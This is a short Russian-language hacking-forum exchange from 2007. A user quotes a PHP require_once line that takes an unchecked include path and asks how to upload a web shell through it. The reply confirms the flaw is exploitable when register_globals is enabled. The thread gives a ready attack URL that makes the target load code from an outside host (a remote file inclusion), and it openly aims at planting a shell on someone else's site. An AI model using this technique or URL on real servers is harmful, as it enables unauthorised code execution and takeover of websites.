12.11.2007, 23:49
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
Сообщение от InvisHero
Привет, в php скрипте, есть сл. код:
PHP код:
require_once $include_path."/include/config.inc.php";
Переменная "$include_path", никак не проверяется, т.е. я могу выполнить следующее:
target.php?include_path=http://somehost.ru
при условии, что на somehost.ru, есть "/include/config.inc.php".
Насколько я понял, подобная уязвимость описывается тут, но мне не совсем понятно, что нужно делать =/
Вопрос: что с этим делать дальше?
Как можно залить шел? Для начала тебе надо было задавать вопрос тут http://forum.antichat.ru/thread46016.html
Да ты прав бага есть и юзать ты можешь так как ты и сказал но есть одно НО! В php.ini должны быть включены register_globals без этого ты не сможешь заюзать эту багу... Ну а как шелл залить надеюсь догадаешься...
__________________
Кто я?..
|
|
|